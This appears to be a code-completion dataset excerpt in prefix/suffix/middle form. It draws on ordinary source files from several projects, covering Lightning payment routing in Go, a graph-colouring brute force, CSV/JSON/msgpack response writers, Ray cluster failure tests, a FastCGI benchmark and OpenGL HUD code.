file_name
stringlengths 3
137
| prefix
stringlengths 0
918k
| suffix
stringlengths 0
962k
| middle
stringlengths 0
812k
|
---|---|---|---|
missioncontrol.go | package routing
import (
"fmt"
"sync"
"time"
"github.com/btcsuite/btcd/btcec"
"github.com/coreos/bbolt"
"github.com/lightningnetwork/lnd/channeldb"
"github.com/lightningnetwork/lnd/lnwire"
)
const (
// vertexDecay is the decay period of colored vertexes added to
// missionControl. Once vertexDecay passes after an entry has been
// added to the prune view, it is garbage collected. This value is
// larger than edgeDecay as an edge failure typical indicates an
// unbalanced channel, while a vertex failure indicates a node is not
// online and active.
vertexDecay = time.Duration(time.Minute * 5)
// edgeDecay is the decay period of colored edges added to
// missionControl. Once edgeDecay passed after an entry has been added,
// it is garbage collected. This value is smaller than vertexDecay as
// an edge related failure during payment sending typically indicates
// that a channel was unbalanced, a condition which may quickly change.
//
// TODO(roasbeef): instead use random delay on each?
edgeDecay = time.Duration(time.Second * 5)
)
// missionControl contains state which summarizes the past attempts of HTLC
// routing by external callers when sending payments throughout the network.
// missionControl remembers the outcome of these past routing attempts (success
// and failure), and is able to provide hints/guidance to future HTLC routing
// attempts. missionControl maintains a decaying network view of the
// edges/vertexes that should be marked as "pruned" during path finding. This
// graph view acts as a shared memory during HTLC payment routing attempts.
// With each execution, if an error is encountered, based on the type of error
// and the location of the error within the route, an edge or vertex is added
// to the view. Later sending attempts will then query the view for all the
// vertexes/edges that should be ignored. Items in the view decay after a set
// period of time, allowing the view to be dynamic w.r.t network changes.
type missionControl struct {
// failedEdges maps a short channel ID to be pruned, to the time that
// it was added to the prune view. Edges are added to this map if a
// caller reports to missionControl a failure localized to that edge
// when sending a payment.
failedEdges map[uint64]time.Time
// failedVertexes maps a node's public key that should be pruned, to
// the time that it was added to the prune view. Vertexes are added to
// this map if a caller reports to missionControl a failure localized
// to that particular vertex.
failedVertexes map[Vertex]time.Time
graph *channeldb.ChannelGraph
selfNode *channeldb.LightningNode
queryBandwidth func(*channeldb.ChannelEdgeInfo) lnwire.MilliSatoshi
sync.Mutex
// TODO(roasbeef): further counters, if vertex continually unavailable,
// add to another generation
// TODO(roasbeef): also add favorable metrics for nodes
}
// newMissionControl returns a new instance of missionControl.
//
// TODO(roasbeef): persist memory
func newMissionControl(g *channeldb.ChannelGraph, selfNode *channeldb.LightningNode,
qb func(*channeldb.ChannelEdgeInfo) lnwire.MilliSatoshi) *missionControl {
return &missionControl{
failedEdges: make(map[uint64]time.Time),
failedVertexes: make(map[Vertex]time.Time),
selfNode: selfNode,
queryBandwidth: qb,
graph: g,
}
}
// graphPruneView is a filter of sorts that path finding routines should
// consult during the execution. Any edges or vertexes within the view should
// be ignored during path finding. The contents of the view reflect the current
// state of the wider network from the PoV of mission control compiled via HTLC
// routing attempts in the past.
type graphPruneView struct {
edges map[uint64]struct{}
vertexes map[Vertex]struct{}
}
// GraphPruneView returns a new graphPruneView instance which is to be
// consulted during path finding. If a vertex/edge is found within the returned
// prune view, it is to be ignored as a goroutine has had issues routing
// through it successfully. Within this method the main view of the
// missionControl is garbage collected as entries are detected to be "stale".
func (m *missionControl) GraphPruneView() graphPruneView {
// First, we'll grab the current time, this value will be used to
// determine if an entry is stale or not.
now := time.Now()
m.Lock()
// For each of the vertexes that have been added to the prune view, if
// it is now "stale", then we'll ignore it and avoid adding it to the
// view we'll return.
vertexes := make(map[Vertex]struct{})
for vertex, pruneTime := range m.failedVertexes {
if now.Sub(pruneTime) >= vertexDecay {
log.Tracef("Pruning decayed failure report for vertex %v "+
"from Mission Control", vertex)
delete(m.failedVertexes, vertex)
continue
}
vertexes[vertex] = struct{}{}
}
// We'll also do the same for edges, but use the edgeDecay this time
// rather than the decay for vertexes.
edges := make(map[uint64]struct{})
for edge, pruneTime := range m.failedEdges {
if now.Sub(pruneTime) >= edgeDecay {
log.Tracef("Pruning decayed failure report for edge %v "+
"from Mission Control", edge)
delete(m.failedEdges, edge)
continue
}
edges[edge] = struct{}{}
}
m.Unlock()
log.Debugf("Mission Control returning prune view of %v edges, %v "+ | return graphPruneView{
edges: edges,
vertexes: vertexes,
}
}
// paymentSession is used during an HTLC routings session to prune the local
// chain view in response to failures, and also report those failures back to
// missionControl. The snapshot copied for this session will only ever grow,
// and will now be pruned after a decay like the main view within mission
// control. We do this as we want to avoid the case where we continually try a
// bad edge or route multiple times in a session. This can lead to an infinite
// loop if payment attempts take long enough. An additional set of edges can
// also be provided to assist in reaching the payment's destination.
type paymentSession struct {
pruneViewSnapshot graphPruneView
additionalEdges map[Vertex][]*channeldb.ChannelEdgePolicy
bandwidthHints map[uint64]lnwire.MilliSatoshi
mc *missionControl
haveRoutes bool
preBuiltRoutes []*Route
}
// NewPaymentSession creates a new payment session backed by the latest prune
// view from Mission Control. An optional set of routing hints can be provided
// in order to populate additional edges to explore when finding a path to the
// payment's destination.
func (m *missionControl) NewPaymentSession(routeHints [][]HopHint,
target *btcec.PublicKey) (*paymentSession, error) {
viewSnapshot := m.GraphPruneView()
edges := make(map[Vertex][]*channeldb.ChannelEdgePolicy)
// Traverse through all of the available hop hints and include them in
// our edges map, indexed by the public key of the channel's starting
// node.
for _, routeHint := range routeHints {
// If multiple hop hints are provided within a single route
// hint, we'll assume they must be chained together and sorted
// in forward order in order to reach the target successfully.
for i, hopHint := range routeHint {
// In order to determine the end node of this hint,
// we'll need to look at the next hint's start node. If
// we've reached the end of the hints list, we can
// assume we've reached the destination.
endNode := &channeldb.LightningNode{}
if i != len(routeHint)-1 {
endNode.AddPubKey(routeHint[i+1].NodeID)
} else {
endNode.AddPubKey(target)
}
// Finally, create the channel edge from the hop hint
// and add it to list of edges corresponding to the node
// at the start of the channel.
edge := &channeldb.ChannelEdgePolicy{
Node: endNode,
ChannelID: hopHint.ChannelID,
FeeBaseMSat: lnwire.MilliSatoshi(
hopHint.FeeBaseMSat,
),
FeeProportionalMillionths: lnwire.MilliSatoshi(
hopHint.FeeProportionalMillionths,
),
TimeLockDelta: hopHint.CLTVExpiryDelta,
}
v := NewVertex(hopHint.NodeID)
edges[v] = append(edges[v], edge)
}
}
// We'll also obtain a set of bandwidthHints from the lower layer for
// each of our outbound channels. This will allow the path finding to
// skip any links that aren't active or just don't have enough
// bandwidth to carry the payment.
sourceNode, err := m.graph.SourceNode()
if err != nil {
return nil, err
}
bandwidthHints, err := generateBandwidthHints(
sourceNode, m.queryBandwidth,
)
if err != nil {
return nil, err
}
return &paymentSession{
pruneViewSnapshot: viewSnapshot,
additionalEdges: edges,
bandwidthHints: bandwidthHints,
mc: m,
}, nil
}
// NewPaymentSessionFromRoutes creates a new paymentSession instance that will
// skip all path finding, and will instead utilize a set of pre-built routes.
// This constructor allows callers to specify their own routes which can be
// used for things like channel rebalancing, and swaps.
func (m *missionControl) NewPaymentSessionFromRoutes(routes []*Route) *paymentSession {
return &paymentSession{
pruneViewSnapshot: m.GraphPruneView(),
haveRoutes: true,
preBuiltRoutes: routes,
mc: m,
}
}
// generateBandwidthHints is a helper function that's utilized the main
// findPath function in order to obtain hints from the lower layer w.r.t to the
// available bandwidth of edges on the network. Currently, we'll only obtain
// bandwidth hints for the edges we directly have open ourselves. Obtaining
// these hints allows us to reduce the number of extraneous attempts as we can
// skip channels that are inactive, or just don't have enough bandwidth to
// carry the payment.
func generateBandwidthHints(sourceNode *channeldb.LightningNode,
queryBandwidth func(*channeldb.ChannelEdgeInfo) lnwire.MilliSatoshi) (map[uint64]lnwire.MilliSatoshi, error) {
// First, we'll collect the set of outbound edges from the target
// source node.
var localChans []*channeldb.ChannelEdgeInfo
err := sourceNode.ForEachChannel(nil, func(tx *bbolt.Tx,
edgeInfo *channeldb.ChannelEdgeInfo,
_, _ *channeldb.ChannelEdgePolicy) error {
localChans = append(localChans, edgeInfo)
return nil
})
if err != nil {
return nil, err
}
// Now that we have all of our outbound edges, we'll populate the set
// of bandwidth hints, querying the lower switch layer for the most up
// to date values.
bandwidthHints := make(map[uint64]lnwire.MilliSatoshi)
for _, localChan := range localChans {
bandwidthHints[localChan.ChannelID] = queryBandwidth(localChan)
}
return bandwidthHints, nil
}
// ReportVertexFailure adds a vertex to the graph prune view after a client
// reports a routing failure localized to the vertex. The time the vertex was
// added is noted, as it'll be pruned from the shared view after a period of
// vertexDecay. However, the vertex will remain pruned for the *local* session.
// This ensures we don't retry this vertex during the payment attempt.
func (p *paymentSession) ReportVertexFailure(v Vertex) {
log.Debugf("Reporting vertex %v failure to Mission Control", v)
// First, we'll add the failed vertex to our local prune view snapshot.
p.pruneViewSnapshot.vertexes[v] = struct{}{}
// With the vertex added, we'll now report back to the global prune
// view, with this new piece of information so it can be utilized for
// new payment sessions.
p.mc.Lock()
p.mc.failedVertexes[v] = time.Now()
p.mc.Unlock()
}
// ReportChannelFailure adds a channel to the graph prune view. The time the
// channel was added is noted, as it'll be pruned from the global view after a
// period of edgeDecay. However, the edge will remain pruned for the duration
// of the *local* session. This ensures that we don't flap by continually
// retrying an edge after its pruning has expired.
//
// TODO(roasbeef): also add value attempted to send and capacity of channel
func (p *paymentSession) ReportChannelFailure(e uint64) {
log.Debugf("Reporting edge %v failure to Mission Control", e)
// First, we'll add the failed edge to our local prune view snapshot.
p.pruneViewSnapshot.edges[e] = struct{}{}
// With the edge added, we'll now report back to the global prune view,
// with this new piece of information so it can be utilized for new
// payment sessions.
p.mc.Lock()
p.mc.failedEdges[e] = time.Now()
p.mc.Unlock()
}
// RequestRoute returns a route which is likely to be capable for successfully
// routing the specified HTLC payment to the target node. Initially the first
// set of paths returned from this method may encounter routing failure along
// the way, however as more payments are sent, mission control will start to
// build an up to date view of the network itself. With each payment a new area
// will be explored, which feeds into the recommendations made for routing.
//
// NOTE: This function is safe for concurrent access.
func (p *paymentSession) RequestRoute(payment *LightningPayment,
height uint32, finalCltvDelta uint16) (*Route, error) {
switch {
// If we have a set of pre-built routes, then we'll just pop off the
// next route from the queue, and use it directly.
case p.haveRoutes && len(p.preBuiltRoutes) > 0:
nextRoute := p.preBuiltRoutes[0]
p.preBuiltRoutes[0] = nil // Set to nil to avoid GC leak.
p.preBuiltRoutes = p.preBuiltRoutes[1:]
return nextRoute, nil
// If we were instantiated with a set of pre-built routes, and we've
// run out, then we'll return a terminal error.
case p.haveRoutes && len(p.preBuiltRoutes) == 0:
return nil, fmt.Errorf("pre-built routes exhausted")
}
// Otherwise we actually need to perform path finding, so we'll obtain
// our current prune view snapshot. This view will only ever grow
// during the duration of this payment session, never shrinking.
pruneView := p.pruneViewSnapshot
log.Debugf("Mission Control session using prune view of %v "+
"edges, %v vertexes", len(pruneView.edges),
len(pruneView.vertexes))
// TODO(roasbeef): sync logic amongst dist sys
// Taking into account this prune view, we'll attempt to locate a path
// to our destination, respecting the recommendations from
// missionControl.
path, err := findPath(
nil, p.mc.graph, p.additionalEdges, p.mc.selfNode,
payment.Target, pruneView.vertexes, pruneView.edges,
payment.Amount, payment.FeeLimit, p.bandwidthHints,
)
if err != nil {
return nil, err
}
// With the next candidate path found, we'll attempt to turn this into
// a route by applying the time-lock and fee requirements.
sourceVertex := Vertex(p.mc.selfNode.PubKeyBytes)
route, err := newRoute(
payment.Amount, payment.FeeLimit, sourceVertex, path, height,
finalCltvDelta,
)
if err != nil {
// TODO(roasbeef): return which edge/vertex didn't work
// out
return nil, err
}
return route, err
}
// ResetHistory resets the history of missionControl returning it to a state as
// if no payment attempts have been made.
func (m *missionControl) ResetHistory() {
m.Lock()
m.failedEdges = make(map[uint64]time.Time)
m.failedVertexes = make(map[Vertex]time.Time)
m.Unlock()
} | "vertexes", len(edges), len(vertexes))
|
brute_force.py | #!/usr/bin/env python
from testcases import gen_random, gen_fake_random
from time import time
begin = time()
RANDOM = True
conf_cnt = 7
if RANDOM:
test_cases = gen_random(10, conf_cnt)
else:
test_cases = gen_fake_random()
def check_valid(colors: list) -> bool:
# check if it's a valid palette
for conflicts in test_cases:
results = [colors[i] for i in conflicts]
if len(set(results)) != len(conflicts):
# conflict exists!
return False
return True
def get_color_count(colors: list) -> int:
# get different color counts in a palette |
for _ in range(1, conf_cnt):
new_palettes = []
for palette in palettes:
for i in range(conf_cnt):
new_palettes.append(palette + [i])
palettes = new_palettes
min_color = conf_cnt
min_palette = []
for palette in palettes:
if not check_valid(palette):
continue
color_count = get_color_count(palette)
if color_count < min_color:
min_color = color_count
min_palette = [palette]
elif color_count == min_color:
min_palette.append(palette)
end = time()
print("Min color count: %d" % min_color)
print("Possible coloring palettes: \n%s" %
('\n'.join([str(p) for p in min_palette])))
print("Min color count: %d" % min_color)
print("\nTime elapsed: %.6fs" % (end - begin)) | return len(set(colors))
palettes = [[0]] |
response_writer.go | package server
import (
"encoding/csv"
"encoding/json"
"io"
"net/http"
"strconv"
"time"
"github.com/cnosdb/cnosdb/vend/db/models"
"github.com/tinylib/msgp/msgp"
)
// ResponseWriter is an interface for writing a response.
type ResponseWriter interface {
// WriteResponse writes a response.
WriteResponse(resp Response) (int, error)
http.ResponseWriter
}
// NewResponseWriter creates a new ResponseWriter based on the Accept header
// in the request that wraps the ResponseWriter.
func NewResponseWriter(w http.ResponseWriter, r *http.Request) ResponseWriter {
pretty := r.URL.Query().Get("pretty") == "true"
rw := &responseWriter{ResponseWriter: w}
switch r.Header.Get("Accept") {
case "application/csv", "text/csv":
w.Header().Add("Content-Type", "text/csv")
rw.formatter = &csvFormatter{statementID: -1}
case "application/x-msgpack":
w.Header().Add("Content-Type", "application/x-msgpack")
rw.formatter = &msgpackFormatter{}
case "application/json":
fallthrough
default:
w.Header().Add("Content-Type", "application/json")
rw.formatter = &jsonFormatter{Pretty: pretty}
}
return rw
}
type bytesCountWriter struct {
w io.Writer
n int
}
func (w *bytesCountWriter) Write(data []byte) (int, error) {
n, err := w.w.Write(data)
w.n += n
return n, err
}
// responseWriter is an implementation of ResponseWriter.
type responseWriter struct {
formatter interface {
WriteResponse(w io.Writer, resp Response) error
}
http.ResponseWriter
}
// WriteResponse writes the response using the formatter.
func (w *responseWriter) WriteResponse(resp Response) (int, error) {
writer := bytesCountWriter{w: w.ResponseWriter}
err := w.formatter.WriteResponse(&writer, resp)
return writer.n, err
}
// Flush flushes the ResponseWriter if it has a Flush() method.
func (w *responseWriter) Flush() {
if w, ok := w.ResponseWriter.(http.Flusher); ok |
}
// CloseNotify calls CloseNotify on the underlying http.ResponseWriter if it
// exists. Otherwise, it returns a nil channel that will never notify.
func (w *responseWriter) CloseNotify() <-chan bool {
if notifier, ok := w.ResponseWriter.(http.CloseNotifier); ok {
return notifier.CloseNotify()
}
return nil
}
type jsonFormatter struct {
Pretty bool
}
func (f *jsonFormatter) WriteResponse(w io.Writer, resp Response) (err error) {
var b []byte
if f.Pretty {
b, err = json.MarshalIndent(resp, "", " ")
} else {
b, err = json.Marshal(resp)
}
if err != nil {
_, err = io.WriteString(w, err.Error())
} else {
_, err = w.Write(b)
}
_, _ = w.Write([]byte("\n"))
return err
}
type csvFormatter struct {
statementID int
columns []string
}
func (f *csvFormatter) WriteResponse(w io.Writer, resp Response) (err error) {
cw := csv.NewWriter(w)
if resp.Err != nil {
_ = cw.Write([]string{"error"})
_ = cw.Write([]string{resp.Err.Error()})
cw.Flush()
return cw.Error()
}
for _, result := range resp.Results {
if result.StatementID != f.statementID {
// If there are no series in the result, skip past this result.
if len(result.Series) == 0 {
continue
}
// Set the statement id and print out a newline if this is not the first statement.
if f.statementID >= 0 {
// Flush the csv writer and write a newline.
cw.Flush()
if err := cw.Error(); err != nil {
return err
}
if _, err := io.WriteString(w, "\n"); err != nil {
return err
}
}
f.statementID = result.StatementID
// Print out the column headers from the first series.
f.columns = make([]string, 2+len(result.Series[0].Columns))
f.columns[0] = "name"
f.columns[1] = "tags"
copy(f.columns[2:], result.Series[0].Columns)
if err := cw.Write(f.columns); err != nil {
return err
}
}
for i, row := range result.Series {
if i > 0 && !stringsEqual(result.Series[i-1].Columns, row.Columns) {
// The columns have changed. Print a newline and reprint the header.
cw.Flush()
if err := cw.Error(); err != nil {
return err
}
if _, err := io.WriteString(w, "\n"); err != nil {
return err
}
f.columns = make([]string, 2+len(row.Columns))
f.columns[0] = "name"
f.columns[1] = "tags"
copy(f.columns[2:], row.Columns)
if err := cw.Write(f.columns); err != nil {
return err
}
}
f.columns[0] = row.Name
if len(row.Tags) > 0 {
f.columns[1] = string(models.NewTags(row.Tags).HashKey()[1:])
} else {
f.columns[1] = ""
}
for _, values := range row.Values {
for i, value := range values {
if value == nil {
f.columns[i+2] = ""
continue
}
switch v := value.(type) {
case float64:
f.columns[i+2] = strconv.FormatFloat(v, 'f', -1, 64)
case int64:
f.columns[i+2] = strconv.FormatInt(v, 10)
case uint64:
f.columns[i+2] = strconv.FormatUint(v, 10)
case string:
f.columns[i+2] = v
case bool:
if v {
f.columns[i+2] = "true"
} else {
f.columns[i+2] = "false"
}
case time.Time:
f.columns[i+2] = strconv.FormatInt(v.UnixNano(), 10)
case *float64, *int64, *string, *bool:
f.columns[i+2] = ""
}
}
_ = cw.Write(f.columns)
}
}
}
cw.Flush()
return cw.Error()
}
type msgpackFormatter struct{}
func (f *msgpackFormatter) ContentType() string {
return "application/x-msgpack"
}
func (f *msgpackFormatter) WriteResponse(w io.Writer, resp Response) (err error) {
enc := msgp.NewWriter(w)
defer enc.Flush()
_ = enc.WriteMapHeader(1)
if resp.Err != nil {
_ = enc.WriteString("error")
_ = enc.WriteString(resp.Err.Error())
return nil
} else {
_ = enc.WriteString("results")
_ = enc.WriteArrayHeader(uint32(len(resp.Results)))
for _, result := range resp.Results {
if result.Err != nil {
_ = enc.WriteMapHeader(1)
_ = enc.WriteString("error")
_ = enc.WriteString(result.Err.Error())
continue
}
sz := 2
if len(result.Messages) > 0 {
sz++
}
if result.Partial {
sz++
}
_ = enc.WriteMapHeader(uint32(sz))
_ = enc.WriteString("statement_id")
_ = enc.WriteInt(result.StatementID)
if len(result.Messages) > 0 {
_ = enc.WriteString("messages")
_ = enc.WriteArrayHeader(uint32(len(result.Messages)))
for _, msg := range result.Messages {
_ = enc.WriteMapHeader(2)
_ = enc.WriteString("level")
_ = enc.WriteString(msg.Level)
_ = enc.WriteString("text")
_ = enc.WriteString(msg.Text)
}
}
_ = enc.WriteString("series")
_ = enc.WriteArrayHeader(uint32(len(result.Series)))
for _, series := range result.Series {
sz := 2
if series.Name != "" {
sz++
}
if len(series.Tags) > 0 {
sz++
}
if series.Partial {
sz++
}
_ = enc.WriteMapHeader(uint32(sz))
if series.Name != "" {
_ = enc.WriteString("name")
_ = enc.WriteString(series.Name)
}
if len(series.Tags) > 0 {
_ = enc.WriteString("tags")
_ = enc.WriteMapHeader(uint32(len(series.Tags)))
for k, v := range series.Tags {
_ = enc.WriteString(k)
_ = enc.WriteString(v)
}
}
_ = enc.WriteString("columns")
_ = enc.WriteArrayHeader(uint32(len(series.Columns)))
for _, col := range series.Columns {
_ = enc.WriteString(col)
}
_ = enc.WriteString("values")
_ = enc.WriteArrayHeader(uint32(len(series.Values)))
for _, values := range series.Values {
_ = enc.WriteArrayHeader(uint32(len(values)))
for _, v := range values {
_ = enc.WriteIntf(v)
}
}
if series.Partial {
_ = enc.WriteString("partial")
_ = enc.WriteBool(series.Partial)
}
}
if result.Partial {
_ = enc.WriteString("partial")
_ = enc.WriteBool(true)
}
}
}
return nil
}
func stringsEqual(a, b []string) bool {
if len(a) != len(b) {
return false
}
for i := range a {
if a[i] != b[i] {
return false
}
}
return true
}
| {
w.Flush()
} |
functions.rs | use std::cmp;
static HAS_WHITE_BIT : u8 = 128;
static HAS_BLACK_BIT : u8 = 64;
pub fn optimistic_min <T: PartialOrd> (v1:T, v2:T) -> T {
let cmpres = v1.partial_cmp(&v2).expect("Could not calculate minimum for some special values. This should not happen.");
match cmpres {
cmp::Ordering::Less => v1,
_ => v2
}
}
pub fn clamp <T> (v:T, smallest:T, biggest:T) -> T
where T: Ord {
cmp::max(cmp::min(v,biggest),smallest)
}
pub fn bw_to_bits (v:u8) -> u8 {
if v >= 128 {
HAS_WHITE_BIT
} else {
HAS_BLACK_BIT
}
}
pub fn bit_compressor (a:u8, b:u8, c:u8, d:u8) -> u8 {
a|b|c|d
}
pub fn has_black_and_white (v:u8) -> bool {
v & (HAS_WHITE_BIT | HAS_BLACK_BIT) == (HAS_WHITE_BIT | HAS_BLACK_BIT)
}
pub fn has_white (v:u8) -> bool {
v & HAS_WHITE_BIT != 0
}
pub fn has_black (v:u8) -> bool {
v & HAS_BLACK_BIT != 0
}
pub fn get_needed (v:u8) -> u8 {
debug_assert!(is_white(v) || is_black(v));
if v & HAS_WHITE_BIT != 0 {
HAS_BLACK_BIT
} else {
HAS_WHITE_BIT
}
}
pub fn is_white (v:u8) -> bool { | pub fn is_black (v:u8) -> bool {
debug_assert!(!has_black_and_white(v));
v & HAS_BLACK_BIT != 0
}
pub fn log2(x: u64) -> Option<u8> {
for i in 0..64 {
let shiftedi : u64 = 1<<i as u64;
let andedx : u64 = x & shiftedi;
if andedx == x {
return Some(i);
}
}
None
} | debug_assert!(!has_black_and_white(v));
v & HAS_WHITE_BIT != 0
}
|
time_limit_wrappers_test.py | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""Unit tests for //compiler_gym/wrappers."""
from compiler_gym.envs.llvm import LlvmEnv
from compiler_gym.wrappers import TimeLimit
from tests.test_main import main
pytest_plugins = ["tests.pytest_plugins.llvm"]
def | (env: LlvmEnv):
env = TimeLimit(env, max_episode_steps=5)
env.close()
assert env.service is None
def test_wrapped_fork_type(env: LlvmEnv):
env = TimeLimit(env, max_episode_steps=5)
fkd = env.fork()
try:
assert isinstance(fkd, TimeLimit)
finally:
fkd.close()
def test_wrapped_step_multi_step(env: LlvmEnv):
env = TimeLimit(env, max_episode_steps=5)
env.reset(benchmark="benchmark://cbench-v1/dijkstra")
env.step([0, 0, 0])
assert env.benchmark == "benchmark://cbench-v1/dijkstra"
assert env.actions == [0, 0, 0]
def test_wrapped_custom_step_args(env: LlvmEnv):
env = TimeLimit(env, max_episode_steps=5)
env.reset(benchmark="benchmark://cbench-v1/dijkstra")
(ic,), _, _, _ = env.step(0, observations=["IrInstructionCount"])
assert isinstance(ic, int)
def test_time_limit_reached(env: LlvmEnv):
env = TimeLimit(env, max_episode_steps=3)
env.reset()
_, _, done, info = env.step(0)
assert not done, info
_, _, done, info = env.step(0)
assert not done, info
_, _, done, info = env.step(0)
assert done, info
assert info["TimeLimit.truncated"], info
_, _, done, info = env.step(0)
assert done, info
assert info["TimeLimit.truncated"], info
def test_time_limit_fork(env: LlvmEnv):
"""Check that the time limit state is copied on fork()."""
env = TimeLimit(env, max_episode_steps=3)
env.reset()
_, _, done, info = env.step(0) # 1st step
assert not done, info
fkd = env.fork()
try:
_, _, done, info = env.step(0) # 2nd step
assert not done, info
_, _, done, info = fkd.step(0) # 2nd step
assert not done, info
_, _, done, info = env.step(0) # 3rd step
assert done, info
_, _, done, info = fkd.step(0) # 3rd step
assert done, info
finally:
fkd.close()
if __name__ == "__main__":
main()
| test_wrapped_close |
test_multinode_failures.py | import os
import signal
import sys
import time
import pytest
import ray
import ray.ray_constants as ray_constants
from ray._private.cluster_utils import Cluster
from ray.test_utils import RayTestTimeoutException, get_other_nodes
SIGKILL = signal.SIGKILL if sys.platform != "win32" else signal.SIGTERM
@pytest.fixture(params=[(1, 4), (4, 4)])
def ray_start_workers_separate_multinode(request):
num_nodes = request.param[0]
num_initial_workers = request.param[1]
# Start the Ray processes.
cluster = Cluster()
for _ in range(num_nodes):
cluster.add_node(num_cpus=num_initial_workers)
ray.init(address=cluster.address)
yield num_nodes, num_initial_workers
# The code after the yield will run as teardown code.
ray.shutdown()
cluster.shutdown()
def test_worker_failed(ray_start_workers_separate_multinode):
num_nodes, num_initial_workers = (ray_start_workers_separate_multinode)
@ray.remote
def get_pids():
time.sleep(0.25)
return os.getpid()
start_time = time.time()
pids = set()
while len(pids) < num_nodes * num_initial_workers:
new_pids = ray.get([
get_pids.remote()
for _ in range(2 * num_nodes * num_initial_workers)
])
for pid in new_pids:
pids.add(pid)
if time.time() - start_time > 60:
raise RayTestTimeoutException(
"Timed out while waiting to get worker PIDs.")
@ray.remote
def f(x):
time.sleep(0.5)
return x
# Submit more tasks than there are workers so that all workers and
# cores are utilized.
object_refs = [f.remote(i) for i in range(num_initial_workers * num_nodes)]
object_refs += [f.remote(object_ref) for object_ref in object_refs]
# Allow the tasks some time to begin executing.
time.sleep(0.1)
# Kill the workers as the tasks execute.
for pid in pids:
try:
os.kill(pid, SIGKILL)
except OSError:
# The process may have already exited due to worker capping.
pass
time.sleep(0.1)
# Make sure that we either get the object or we get an appropriate
# exception.
for object_ref in object_refs:
try:
ray.get(object_ref)
except (ray.exceptions.RayTaskError,
ray.exceptions.WorkerCrashedError):
pass
def _test_component_failed(cluster, component_type):
"""Kill a component on all worker nodes and check workload succeeds."""
# Submit many tasks with many dependencies.
@ray.remote
def f(x):
# Sleep to make sure that tasks actually fail mid-execution.
time.sleep(0.01)
return x
@ray.remote
def g(*xs):
# Sleep to make sure that tasks actually fail mid-execution. We
# only use it for direct calls because the test already takes a
# long time to run with the raylet codepath.
time.sleep(0.01)
return 1
# Kill the component on all nodes except the head node as the tasks
# execute. Do this in a loop while submitting tasks between each
# component failure.
time.sleep(0.1)
worker_nodes = get_other_nodes(cluster)
assert len(worker_nodes) > 0
for node in worker_nodes:
process = node.all_processes[component_type][0].process
# Submit a round of tasks with many dependencies.
x = 1
for _ in range(1000):
x = f.remote(x)
xs = [g.remote(1)]
for _ in range(100):
xs.append(g.remote(*xs))
xs.append(g.remote(1))
# Kill a component on one of the nodes.
process.terminate()
time.sleep(1)
process.kill()
process.wait()
assert not process.poll() is None
# Make sure that we can still get the objects after the
# executing tasks died.
ray.get(x)
ray.get(xs)
def check_components_alive(cluster, component_type, check_component_alive):
"""Check that a given component type is alive on all worker nodes."""
worker_nodes = get_other_nodes(cluster)
assert len(worker_nodes) > 0
for node in worker_nodes:
process = node.all_processes[component_type][0].process
if check_component_alive:
assert process.poll() is None
else:
print("waiting for " + component_type + " with PID " +
str(process.pid) + "to terminate")
process.wait()
print("done waiting for " + component_type + " with PID " +
str(process.pid) + "to terminate")
assert not process.poll() is None
@pytest.mark.parametrize(
"ray_start_cluster",
[{
"num_cpus": 8,
"num_nodes": 4,
"_system_config": {
# Raylet codepath is not stable with a shorter timeout.
"num_heartbeats_timeout": 10
},
}],
indirect=True)
def | (ray_start_cluster):
cluster = ray_start_cluster
# Kill all raylets on worker nodes.
_test_component_failed(cluster, ray_constants.PROCESS_TYPE_RAYLET)
# The plasma stores should still be alive on the worker nodes.
check_components_alive(cluster, ray_constants.PROCESS_TYPE_PLASMA_STORE,
True)
if __name__ == "__main__":
import pytest
sys.exit(pytest.main(["-v", __file__]))
| test_raylet_failed |
soln.py | import heapq
import random
def merge(lists):
heapq.heapify(lists)
m = []
while len(lists) > 0:
l = heapq.heappop(lists)
if len(l) == 0:
continue
m.append(l.pop(0))
heapq.heappush(lists, l)
return m
def test(n, k):
lists = [[] for _ in xrange(k)]
for i in xrange(n):
lists[random.randrange(k)].append(i)
m = merge(lists)
assert m == range(n)
print 'pass' |
if __name__ == '__main__':
main() |
def main():
test(100000, 50) |
async_client_bench.rs | #![feature(test)]
extern crate test;
use fastcgi_client::{request::Request, Client, Params};
use std::env::current_dir;
use test::Bencher;
use tokio::{
io::{self, AsyncRead, AsyncWrite},
net::TcpStream,
};
mod common;
async fn test_client<S: AsyncRead + AsyncWrite + Unpin>(client: &mut Client<S>) {
let document_root = current_dir().unwrap().join("tests").join("php");
let document_root = document_root.to_str().unwrap();
let script_name = current_dir()
.unwrap()
.join("tests")
.join("php")
.join("index.php");
let script_name = script_name.to_str().unwrap();
let params = Params::default()
.set_request_method("GET")
.set_document_root(document_root)
.set_script_name("/index.php")
.set_script_filename(script_name)
.set_request_uri("/index.php")
.set_document_uri("/index.php")
.set_remote_addr("127.0.0.1")
.set_remote_port("12345")
.set_server_addr("127.0.0.1")
.set_server_port("80")
.set_server_name("jmjoy-pc")
.set_content_type("")
.set_content_length("0");
let output = client
.execute(Request::new(params, &mut io::empty()))
.await
.unwrap();
let stdout = String::from_utf8(output.get_stdout().unwrap_or(Default::default())).unwrap();
assert!(stdout.contains("Content-type: text/html; charset=UTF-8"));
assert!(stdout.contains("\r\n\r\n"));
assert!(stdout.contains("hello"));
assert_eq!(output.get_stderr(), None);
}
#[bench]
fn | (b: &mut Bencher) {
common::setup();
let rt = tokio::runtime::Builder::new_multi_thread()
.worker_threads(6)
.enable_all()
.build()
.unwrap();
let mut client = rt.block_on(async {
let stream = TcpStream::connect(("127.0.0.1", 9000)).await.unwrap();
Client::new(stream, true)
});
b.iter(|| {
rt.block_on(async {
test_client(&mut client).await;
});
});
}
| bench_execute |
lines.go | package hud
import (
"github.com/faiface/glhf"
"github.com/go-gl/gl/v3.3-core/gl"
"github.com/go-gl/mathgl/mgl32"
)
// Lines holds vao, vbo, shader and vertex data for HUD line models
type Lines struct {
vao, vbo uint32
shader *glhf.Shader
nvertex int
}
// NewLines creates a new instance of *Lines to be rendered as HUD on screen
func NewLines(shader *glhf.Shader, data []float32) *Lines |
// Render will render HUD lines to screen
func (l *Lines) Render(mat mgl32.Mat4) {
if l.vao != 0 {
l.shader.SetUniformAttr(0, mat)
gl.BindVertexArray(l.vao)
gl.DrawArrays(gl.LINES, 0, int32(l.nvertex))
gl.BindVertexArray(0)
}
}
// Release will release the *Lines data from VRAM
func (l *Lines) Release() {
if l.vao != 0 {
gl.DeleteVertexArrays(1, &l.vao)
gl.DeleteBuffers(1, &l.vbo)
l.vao = 0
l.vbo = 0
}
} | {
